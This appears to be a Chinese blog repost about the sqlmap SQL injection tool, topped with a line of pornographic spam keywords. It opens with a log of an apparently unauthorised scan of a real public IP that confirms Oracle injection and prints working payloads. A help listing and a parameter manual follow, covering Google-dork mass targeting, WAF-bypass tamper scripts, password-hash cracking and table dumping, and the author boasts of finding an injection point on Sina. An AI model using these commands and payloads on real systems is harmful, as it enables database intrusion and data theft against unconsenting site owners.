久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

信息嗅探

發(fā)布時間:2023/12/29 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 信息嗅探 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

1、kali linux SQLmap 信息嗅探

?[*] starting at 17:42:27

[17:42:27] [INFO] testing connection to the target URL
[17:42:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[17:42:28] [INFO] testing if the target URL content is stable
[17:42:29] [WARNING] target URL content is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[17:42:30] [INFO] testing if GET parameter 'id' is dynamic
[17:42:30] [WARNING] GET parameter 'id' does not appear to be dynamic
[17:42:30] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[17:42:30] [INFO] testing for SQL injection on GET parameter 'id'
[17:42:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:42:32] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[17:42:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:42:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:42:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:42:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:42:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[17:42:34] [INFO] testing 'MySQL inline queries'
[17:42:35] [INFO] testing 'PostgreSQL inline queries'
[17:42:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:42:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:42:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:42:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:42:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[17:42:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[17:42:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[17:42:37] [INFO] testing 'Oracle AND time-based blind'
[17:42:48] [INFO] GET parameter 'id' appears to be 'Oracle AND time-based blind' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n]
[17:42:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:42:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:42:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:42:54] [INFO] target URL appears to have 80 columns in query
[17:43:57] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 265 HTTP(s) requests:
---
Parameter: id (GET)
??? Type: AND/OR time-based blind
??? Title: Oracle AND time-based blind
??? Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

??? Type: UNION query
??? Title: Generic UNION query (NULL) - 80 columns
??? Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[17:44:00] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[17:44:00] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 17:44:00
2、幫助文檔命令 Usage: python sqlmap [options]

Options:
? -h, --help??????????? Show basic help message and exit
? -hh?????????????????? Show advanced help message and exit
? --version???????????? Show program's version number and exit
? -v VERBOSE??????????? Verbosity level: 0-6 (default 1)

? Target:
??? At least one of these options has to be provided to define the
??? target(s)

??? -u URL, --url=URL?? Target URL (e.g. "http://www.site.com/vuln.php?id=1")
??? -g GOOGLEDORK?????? Process Google dork results as target URLs

? Request:
??? These options can be used to specify how to connect to the target URL

??? --data=DATA???????? Data string to be sent through POST
??? --cookie=COOKIE???? HTTP Cookie header value
??? --random-agent????? Use randomly selected HTTP User-Agent header value
??? --proxy=PROXY?????? Use a proxy to connect to the target URL
??? --tor?????????????? Use Tor anonymity network
??? --check-tor???????? Check to see if Tor is used properly

? Injection:
??? These options can be used to specify which parameters to test for,
??? provide custom injection payloads and optional tampering scripts

??? -p TESTPARAMETER??? Testable parameter(s)
??? --dbms=DBMS???????? Force back-end DBMS to this value

? Detection:
??? These options can be used to customize the detection phase

??? --level=LEVEL?????? Level of tests to perform (1-5, default 1)
??? --risk=RISK???????? Risk of tests to perform (1-3, default 1)

? Techniques:
??? These options can be used to tweak testing of specific SQL injection
??? techniques

??? --technique=TECH??? SQL injection techniques to use (default "BEUSTQ")

? Enumeration:
??? These options can be used to enumerate the back-end database
??? management system information, structure and data contained in the
??? tables. Moreover you can run your own SQL statements

??? -a, --all?????????? Retrieve everything
??? -b, --banner??????? Retrieve DBMS banner
??? --current-user????? Retrieve DBMS current user
??? --current-db??????? Retrieve DBMS current database
??? --passwords???????? Enumerate DBMS users password hashes
??? --tables??????????? Enumerate DBMS database tables
??? --columns?????????? Enumerate DBMS database table columns
??? --schema??????????? Enumerate DBMS schema
??? --dump????????????? Dump DBMS database table entries
??? --dump-all????????? Dump all DBMS databases tables entries
??? -D DB?????????????? DBMS database to enumerate
??? -T TBL????????????? DBMS database table(s) to enumerate
??? -C COL????????????? DBMS database table column(s) to enumerate

? Operating system access:
??? These options can be used to access the back-end database management
??? system underlying operating system

??? --os-shell????????? Prompt for an interactive operating system shell
??? --os-pwn??????????? Prompt for an OOB shell, Meterpreter or VNC

? General:
??? These options can be used to set some general working parameters

??? --batch???????????? Never ask for user input, use the default behaviour
??? --flush-session???? Flush session files for current target

? Miscellaneous:
??? --sqlmap-shell????? Prompt for an interactive sqlmap shell
??? --wizard??????????? Simple wizard interface for beginner users
附錄:參數(shù)手冊

sqlmap支持五種不同的注入模式:

1、基于布爾的盲注,即可以根據(jù)返回頁面判斷條件真假的注入。2、基于時間的盲注,即不能根據(jù)頁面返回內(nèi)容判斷任何信息,用條件語句查看時間延遲語句是否執(zhí)行(即頁面返回時間是否增加)來判斷。3、基于報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結(jié)果直接返回在頁面中。4、聯(lián)合查詢注入,可以使用union的情況下的注入。5、堆查詢注入,可以同時執(zhí)行多條語句的執(zhí)行時的注入。

sqlmap支持的數(shù)據(jù)庫有:

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

可以提供一個簡單的URL,Burp或WebScarab請求日志文件,文本文檔中的完整http請求或者Google的搜索,匹配出結(jié)果頁面,也可以自己定義一個正則來判斷那個地址去測試。

測試GET參數(shù),POST參數(shù),HTTP Cookie參數(shù),HTTP User-Agent頭和HTTP Referer頭來確認是否有SQL注入,它也可以指定用逗號分隔的列表的具體參數(shù)來測試。

可以設(shè)定HTTP(S)請求的并發(fā)數(shù),來提高盲注時的效率。

Youtube上有人做的使用sqlmap的視頻:

http://www.youtube.com/user/inquisb/videos

http://www.youtube.com/user/stamparm/videos

使用sqlmap的實例文章:

http://unconciousmind.blogspot.com/search/label/sqlmap

可以點擊https://github.com/sqlmapproject/sqlmap/tarball/master下載最新版本sqlmap。

也可以使用git來獲取sqlmap

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

之后可以直接使用命令來更新

python sqlmap.py --update

或者

git pull

更新sqlmap

如果你想觀察sqlmap對一個點是進行了怎樣的嘗試判斷以及讀取數(shù)據(jù)的,可以使用-v參數(shù)。

共有七個等級,默認為1:

0、只顯示python錯誤以及嚴重的信息。1、同時顯示基本信息和警告信息。(默認)2、同時顯示debug信息。3、同時顯示注入的payload。4、同時顯示HTTP請求。5、同時顯示HTTP響應(yīng)頭。6、同時顯示HTTP響應(yīng)頁面。

如果你想看到sqlmap發(fā)送的測試payload最好的等級就是3。

獲取目標方式


目標URL

參數(shù):-u或者--url

格式:http(s)://targeturl[:port]/[…]

例如:python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

從Burp或者WebScarab代理中獲取日志

參數(shù):-l

可以直接吧Burp proxy或者WebScarab proxy中的日志直接倒出來交給sqlmap來一個一個檢測是否有注入。

從文本中獲取多個目標掃描

參數(shù):-m

文件中保存url格式如下,sqlmap會一個一個檢測

www.target1.com/vuln1.php?q=foobarwww.target2.com/vuln2.asp?id=1www.target3.com/vuln3/id/1*

從文件中加載HTTP請求

參數(shù):-r

sqlmap可以從一個文本文件中獲取HTTP請求,這樣就可以跳過設(shè)置一些其他參數(shù)(比如cookie,POST數(shù)據(jù),等等)。

比如文本文件內(nèi)如下:

POST /vuln.php HTTP/1.1 Host: www.target.com User-Agent: Mozilla/4.0id=1

當(dāng)請求是HTTPS的時候你需要配合這個--force-ssl參數(shù)來使用,或者你可以在Host頭后門加上:443

處理Google的搜索結(jié)果

參數(shù):-g

sqlmap可以測試注入Google的搜索結(jié)果中的GET參數(shù)(只獲取前100個結(jié)果)。

例子:

python sqlmap.py -g "inurl:\".php?id=1\""

(很牛B的功能,測試了一下,第十幾個就找到新浪的一個注入點)

此外可以使用-c參數(shù)加載sqlmap.conf文件里面的相關(guān)配置。

請求


http數(shù)據(jù)

參數(shù):--data

此參數(shù)是把數(shù)據(jù)以POST方式提交,sqlmap會像檢測GET參數(shù)一樣檢測POST的參數(shù)。

例子:

python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

參數(shù)拆分字符

參數(shù):--param-del

當(dāng)GET或POST的數(shù)據(jù)需要用其他字符分割測試參數(shù)的時候需要用到此參數(shù)。

例子:

python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

HTTP cookie頭

參數(shù):--cookie,--load-cookies,--drop-set-cookie

這個參數(shù)在以下兩個方面很有用:

1、web應(yīng)用需要登陸的時候。

2、你想要在這些頭參數(shù)中測試SQL注入時。

可以通過抓包把cookie獲取到,復(fù)制出來,然后加到--cookie參數(shù)里。

在HTTP請求中,遇到Set-Cookie的話,sqlmap會自動獲取并且在以后的請求中加入,并且會嘗試SQL注入。

如果你不想接受Set-Cookie可以使用--drop-set-cookie參數(shù)來拒接。

當(dāng)你使用--cookie參數(shù)時,當(dāng)返回一個Set-Cookie頭的時候,sqlmap會詢問你用哪個cookie來繼續(xù)接下來的請求。當(dāng)--level的參數(shù)設(shè)定為2或者2以上的時候,sqlmap會嘗試注入Cookie參數(shù)。

HTTP User-Agent頭

參數(shù):--user-agent,--random-agent

默認情況下sqlmap的HTTP請求頭中User-Agent值是:

sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

可以使用--user-anget參數(shù)來修改,同時也可以使用--random-agnet參數(shù)來隨機的從./txt/user-agents.txt中獲取。

當(dāng)--level參數(shù)設(shè)定為3或者3以上的時候,會嘗試對User-Angent進行注入。

HTTP Referer頭

參數(shù):--referer

sqlmap可以在請求中偽造HTTP中的referer,當(dāng)--level參數(shù)設(shè)定為3或者3以上的時候會嘗試對referer注入。

額外的HTTP頭

參數(shù):--headers

可以通過--headers參數(shù)來增加額外的http頭

HTTP認證保護

參數(shù):--auth-type,--auth-cred

這些參數(shù)可以用來登陸HTTP的認證保護支持三種方式:

1、Basic

2、Digest

3、NTLM

例子:

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP協(xié)議的證書認證

參數(shù):--auth-cert

當(dāng)Web服務(wù)器需要客戶端證書進行身份驗證時,需要提供兩個文件:key_file,cert_file。

key_file是格式為PEM文件,包含著你的私鑰,cert_file是格式為PEM的連接文件。

HTTP(S)代理

參數(shù):--proxy,--proxy-cred和--ignore-proxy

使用--proxy代理是格式為:http://url:port。

當(dāng)HTTP(S)代理需要認證是可以使用--proxy-cred參數(shù):username:password。

--ignore-proxy拒絕使用本地局域網(wǎng)的HTTP(S)代理。

HTTP請求延遲

參數(shù):--delay

可以設(shè)定兩個HTTP(S)請求間的延遲,設(shè)定為0.5的時候是半秒,默認是沒有延遲的。

設(shè)定超時時間

參數(shù):--timeout

可以設(shè)定一個HTTP(S)請求超過多久判定為超時,10.5表示10.5秒,默認是30秒。

設(shè)定重試超時

參數(shù):--retries

當(dāng)HTTP(S)超時時,可以設(shè)定重新嘗試連接次數(shù),默認是3次。

設(shè)定隨機改變的參數(shù)值

參數(shù):--randomize

可以設(shè)定某一個參數(shù)值在每一次請求中隨機的變化,長度和類型會與提供的初始值一樣。

利用正則過濾目標網(wǎng)址

參數(shù):--scope

例如:

python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

避免過多的錯誤請求被屏蔽

參數(shù):--safe-url,--safe-freq

有的web應(yīng)用程序會在你多次訪問錯誤的請求時屏蔽掉你以后的所有請求,這樣在sqlmap進行探測或者注入的時候可能造成錯誤請求而觸發(fā)這個策略,導(dǎo)致以后無法進行。

繞過這個策略有兩種方式:

1、--safe-url:提供一個安全不錯誤的連接,每隔一段時間都會去訪問一下。 2、--safe-freq:提供一個安全不錯誤的連接,每次測試請求之后都會再訪問一邊安全連接。

關(guān)掉URL參數(shù)值編碼

參數(shù):--skip-urlencode

根據(jù)參數(shù)位置,他的值默認將會被URL編碼,但是有些時候后端的web服務(wù)器不遵守RFC標準,只接受不經(jīng)過URL編碼的值,這時候就需要用--skip-urlencode參數(shù)。

每次請求時候執(zhí)行自定義的python代碼

參數(shù):--eval

在有些時候,需要根據(jù)某個參數(shù)的變化,而修改另個一參數(shù),才能形成正常的請求,這時可以用--eval參數(shù)在每次請求時根據(jù)所寫python代碼做完修改后請求。

例子:

python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

上面的請求就是每次請求時根據(jù)id參數(shù)值,做一次md5后作為hash參數(shù)的值。

注入


測試參數(shù)

參數(shù):-p,--skip

sqlmap默認測試所有的GET和POST參數(shù),當(dāng)--level的值大于等于2的時候也會測試HTTP Cookie頭的值,當(dāng)大于等于3的時候也會測試User-Agent和HTTP Referer頭的值。但是你可以手動用-p參數(shù)設(shè)置想要測試的參數(shù)。例如: -p "id,user-anget"

當(dāng)你使用--level的值很大但是有個別參數(shù)不想測試的時候可以使用--skip參數(shù)。

例如:--skip="user-angent.referer"

在有些時候web服務(wù)器使用了URL重寫,導(dǎo)致無法直接使用sqlmap測試參數(shù),可以在想測試的參數(shù)后面加*

例如:

python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

sqlmap將會測試value1的位置是否可注入。

指定數(shù)據(jù)庫

參數(shù):--dbms

默認情況系sqlmap會自動的探測web應(yīng)用后端的數(shù)據(jù)庫是什么,sqlmap支持的數(shù)據(jù)庫有:

MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAP MaxDB、DB2

指定數(shù)據(jù)庫服務(wù)器系統(tǒng)

參數(shù):--os

默認情況下sqlmap會自動的探測數(shù)據(jù)庫服務(wù)器系統(tǒng),支持的系統(tǒng)有:Linux、Windows。

指定無效的大數(shù)字

參數(shù):--invalid-bignum

當(dāng)你想指定一個報錯的數(shù)值時,可以使用這個參數(shù),例如默認情況系id=13,sqlmap會變成id=-13來報錯,你可以指定比如id=9999999來報錯。

指定無效的邏輯

參數(shù):--invalid-logical

原因同上,可以指定id=13把原來的id=-13的報錯改成id=13 AND 18=19。

注入payload

參數(shù):--prefix,--suffix

在有些環(huán)境中,需要在注入的payload的前面或者后面加一些字符,來保證payload的正常執(zhí)行。

例如,代碼中是這樣調(diào)用數(shù)據(jù)庫的:

$query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1";

這時你就需要--prefix和--suffix參數(shù)了:

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" --suffix "AND (’abc’=’abc"

這樣執(zhí)行的SQL語句變成:

$query = "SELECT * FROM users WHERE id=(’1’) <PAYLOAD> AND (’abc’=’abc’) LIMIT 0, 1";

修改注入的數(shù)據(jù)

參數(shù):--tamper

sqlmap除了使用CHAR()函數(shù)來防止出現(xiàn)單引號之外沒有對注入的數(shù)據(jù)修改,你可以使用--tamper參數(shù)對數(shù)據(jù)做修改來繞過WAF等設(shè)備。

下面是一個tamper腳本的格式:

# Needed imports from lib.core.enums import PRIORITY # Define which is the order of application of tamper scripts against # the payload __priority__ = PRIORITY.NORMAL def tamper(payload):'''Description of your tamper script'''retVal = payload# your code to tamper the original payload# return the tampered payloadreturn retVal

可以查看 tamper/ 目錄下的有哪些可用的腳本

例如:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3[hh:mm:03] [DEBUG] cleaning up configuration parameters [hh:mm:03] [INFO] loading tamper script 'between' [hh:mm:03] [INFO] loading tamper script 'randomcase' [hh:mm:03] [INFO] loading tamper script 'space2comment' [...] [hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092 [hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057 [hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041 [...] [hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar( 58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/ ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/ group/**/bY/**/x)a) [hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [...]

探測


探測等級

參數(shù):--level

共有五個等級,默認為1,sqlmap使用的payload可以在xml/payloads.xml中看到,你也可以根據(jù)相應(yīng)的格式添加自己的payload。

這個參數(shù)不僅影響使用哪些payload同時也會影響測試的注入點,GET和POST的數(shù)據(jù)都會測試,HTTP Cookie在level為2的時候就會測試,HTTP User-Agent/Referer頭在level為3的時候就會測試。

總之在你不確定哪個payload或者參數(shù)為注入點的時候,為了保證全面性,建議使用高的level值。

風(fēng)險等級

參數(shù):--risk

共有四個風(fēng)險等級,默認是1會測試大部分的測試語句,2會增加基于事件的測試語句,3會增加OR語句的SQL注入測試。

在有些時候,例如在UPDATE的語句中,注入一個OR的測試語句,可能導(dǎo)致更新的整個表,可能造成很大的風(fēng)險。

測試的語句同樣可以在xml/payloads.xml中找到,你也可以自行添加payload。

頁面比較

參數(shù):--string,--not-string,--regexp,--code

默認情況下sqlmap通過判斷返回頁面的不同來判斷真假,但有時候這會產(chǎn)生誤差,因為有的頁面在每次刷新的時候都會返回不同的代碼,比如頁面當(dāng)中包含一個動態(tài)的廣告或者其他內(nèi)容,這會導(dǎo)致sqlmap的誤判。此時用戶可以提供一個字符串或者一段正則匹配,在原始頁面與真條件下的頁面都存在的字符串,而錯誤頁面中不存在(使用--string參數(shù)添加字符串,--regexp添加正則),同時用戶可以提供一段字符串在原始頁面與真條件下的頁面都不存在的字符串,而錯誤頁面中存在的字符串(--not-string添加)。用戶也可以提供真與假條件返回的HTTP狀態(tài)碼不一樣來注入,例如,響應(yīng)200的時候為真,響應(yīng)401的時候為假,可以添加參數(shù)--code=200。

參數(shù):--text-only,--titles

有些時候用戶知道真條件下的返回頁面與假條件下返回頁面是不同位置在哪里可以使用--text-only(HTTP響應(yīng)體中不同)--titles(HTML的title標簽中不同)。

注入技術(shù)


測試是否是注入

參數(shù):--technique

這個參數(shù)可以指定sqlmap使用的探測技術(shù),默認情況下會測試所有的方式。

支持的探測方式如下:

B: Boolean-based blind SQL injection(布爾型注入) E: Error-based SQL injection(報錯型注入) U: UNION query SQL injection(可聯(lián)合查詢注入) S: Stacked queries SQL injection(可多語句查詢注入) T: Time-based blind SQL injection(基于時間延遲注入)

設(shè)定延遲注入的時間

參數(shù):--time-sec

當(dāng)使用基于時間的盲注時,時刻使用--time-sec參數(shù)設(shè)定延時時間,默認是5秒。

設(shè)定UNION查詢字段數(shù)

參數(shù):--union-cols

默認情況下sqlmap測試UNION查詢注入會測試1-10個字段數(shù),當(dāng)--level為5的時候他會增加測試到50個字段數(shù)。設(shè)定--union-cols的值應(yīng)該是一段整數(shù),如:12-16,是測試12-16個字段數(shù)。

設(shè)定UNION查詢使用的字符

參數(shù):--union-char

默認情況下sqlmap針對UNION查詢的注入會使用NULL字符,但是有些情況下會造成頁面返回失敗,而一個隨機整數(shù)是成功的,這是你可以用--union-char只定UNION查詢的字符。

二階SQL注入

參數(shù):--second-order

有些時候注入點輸入的數(shù)據(jù)看返回結(jié)果的時候并不是當(dāng)前的頁面,而是另外的一個頁面,這時候就需要你指定到哪個頁面獲取響應(yīng)判斷真假。--second-order后門跟一個判斷頁面的URL地址。

列數(shù)據(jù)


合并起來使用:-current-user?--current-db?--is-dba?--users

標志

參數(shù):-b,--banner

大多數(shù)的數(shù)據(jù)庫系統(tǒng)都有一個函數(shù)可以返回數(shù)據(jù)庫的版本號,通常這個函數(shù)是version()或者變量@@version這主要取決與是什么數(shù)據(jù)庫。

用戶

參數(shù):-current-user

在大多數(shù)據(jù)庫中可以獲取到管理數(shù)據(jù)的用戶。

當(dāng)前數(shù)據(jù)庫

參數(shù):--current-db

返還當(dāng)前連接的數(shù)據(jù)庫。

當(dāng)前用戶是否為管理用

參數(shù):--is-dba

判斷當(dāng)前的用戶是否為管理,是的話會返回True。

列數(shù)據(jù)庫管理用戶

參數(shù):--users

當(dāng)前用戶有權(quán)限讀取包含所有用戶的表的權(quán)限時,就可以列出所有管理用戶。

列出并破解數(shù)據(jù)庫用戶的hash

參數(shù):--passwords

當(dāng)前用戶有權(quán)限讀取包含用戶密碼的表的權(quán)限時,sqlmap會現(xiàn)列舉出用戶,然后列出hash,并嘗試破解。

例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1 [...] back-end DBMS: PostgreSQL [hh:mm:38] [INFO] fetching database users password hashes do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y [hh:mm:42] [INFO] using hash method: 'postgres_passwd' what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt] [hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt' do you want to use common password suffixes? (slow!) [y/N] n [hh:mm:48] [INFO] starting dictionary attack (postgres_passwd) [hh:mm:49] [INFO] found: 'testpass' for user: 'testuser' [hh:mm:50] [INFO] found: 'testpass' for user: 'postgres' database management system users password hashes: [*] postgres [1]:password hash: md5d7d880f96044b72d0bba108ace96d1e4clear-text password: testpass [*] testuser [1]:password hash: md599e5ea7a6f7c3269995cba3927fd0093clear-text password: testpass

可以看到sqlmap不僅識別出數(shù)據(jù)庫的用戶跟密碼,同時也識別出是PostgreSQL數(shù)據(jù)庫,并詢問用戶是否采用字典爆破的方式進行破解,這個爆破已經(jīng)支持Oracle和Microsoft SQL Server。

也可以提供-U參數(shù)來指定爆破哪個用戶的hash。

列出數(shù)據(jù)庫管理員權(quán)限

參數(shù):--privileges

當(dāng)前用戶有權(quán)限讀取包含所有用戶的表的權(quán)限時,很可能列舉出每個用戶的權(quán)限,sqlmap將會告訴你哪個是數(shù)據(jù)庫的超級管理員。也可以用-U參數(shù)指定你想看哪個用戶的權(quán)限。

列出數(shù)據(jù)庫管理員角色

參數(shù):--roles

當(dāng)前用戶有權(quán)限讀取包含所有用戶的表的權(quán)限時,很可能列舉出每個用戶的角色,也可以用-U參數(shù)指定你想看哪個用戶的角色。

僅適用于當(dāng)前數(shù)據(jù)庫是Oracle的時候。

列出數(shù)據(jù)庫系統(tǒng)的數(shù)據(jù)庫

參數(shù):--dbs

當(dāng)前用戶有權(quán)限讀取包含所有數(shù)據(jù)庫列表信息的表中的時候,即可列出所有的數(shù)據(jù)庫。

列舉數(shù)據(jù)庫表

參數(shù):--tables,--exclude-sysdbs,-D

當(dāng)前用戶有權(quán)限讀取包含所有數(shù)據(jù)庫表信息的表中的時候,即可列出一個特定數(shù)據(jù)的所有表。

如果你不提供-D參數(shù)來列指定的一個數(shù)據(jù)的時候,sqlmap會列出數(shù)據(jù)庫所有庫的所有表。

--exclude-sysdbs參數(shù)是指包含了所有的系統(tǒng)數(shù)據(jù)庫。

需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是數(shù)據(jù)庫名稱。

列舉數(shù)據(jù)庫表中的字段

參數(shù):--columns,-C,-T,-D

當(dāng)前用戶有權(quán)限讀取包含所有數(shù)據(jù)庫表信息的表中的時候,即可列出指定數(shù)據(jù)庫表中的字段,同時也會列出字段的數(shù)據(jù)類型。

如果沒有使用-D參數(shù)指定數(shù)據(jù)庫時,默認會使用當(dāng)前數(shù)據(jù)庫。

列舉一個SQLite的例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users -C name [...] Database: SQLite_masterdb Table: users [3 columns] +---------+---------+ | Column??| Type????| +---------+---------+ | id??????| INTEGER | | name????| TEXT????| | surname | TEXT????| +---------+---------+

列舉數(shù)據(jù)庫系統(tǒng)的架構(gòu)

參數(shù):--schema,--exclude-sysdbs

用戶可以用此參數(shù)獲取數(shù)據(jù)庫的架構(gòu),包含所有的數(shù)據(jù)庫,表和字段,以及各自的類型。

加上--exclude-sysdbs參數(shù),將不會獲取數(shù)據(jù)庫自帶的系統(tǒng)庫內(nèi)容。

MySQL例子:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --schema --batch --exclude-sysdbs [...] Database: owasp10 Table: accounts [4 columns] +-------------+---------+ | Column??????| Type????| +-------------+---------+ | cid???????? | int(11) | | mysignature | text????| | password????| text????| | username????| text????| +-------------+---------+Database: owasp10 Table: blogs_table [4 columns] +--------------+----------+ | Column?????? | Type???? | +--------------+----------+ | date???????? | datetime | | blogger_name | text???? | | cid??????????| int(11)??| | comment??????| text???? | +--------------+----------+Database: owasp10 Table: hitlog [6 columns] +----------+----------+ | Column?? | Type???? | +----------+----------+ | date???? | datetime | | browser??| text???? | | cid??????| int(11)??| | hostname | text???? | | ip?????? | text???? | | referer??| text???? | +----------+----------+Database: testdb Table: users [3 columns] +---------+---------------+ | Column??| Type??????????| +---------+---------------+ | id??????| int(11)?????? | | name????| varchar(500)??| | surname | varchar(1000) | +---------+---------------+ [...]

獲取表中數(shù)據(jù)個數(shù)

參數(shù):--count

有時候用戶只想獲取表中的數(shù)據(jù)個數(shù)而不是具體的內(nèi)容,那么就可以使用這個參數(shù)。

列舉一個Microsoft SQL Server例子:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb [...] Database: testdb +----------------+---------+ | Table??????????| Entries | +----------------+---------+ | dbo.users??????| 4?????? | | dbo.users_blob | 2?????? | +----------------+---------+

獲取整個表的數(shù)據(jù)

參數(shù):--dump,-C,-T,-D,--start,--stop,--first,--last

如果當(dāng)前管理員有權(quán)限讀取數(shù)據(jù)庫其中的一個表的話,那么就能獲取整個表的所有內(nèi)容。

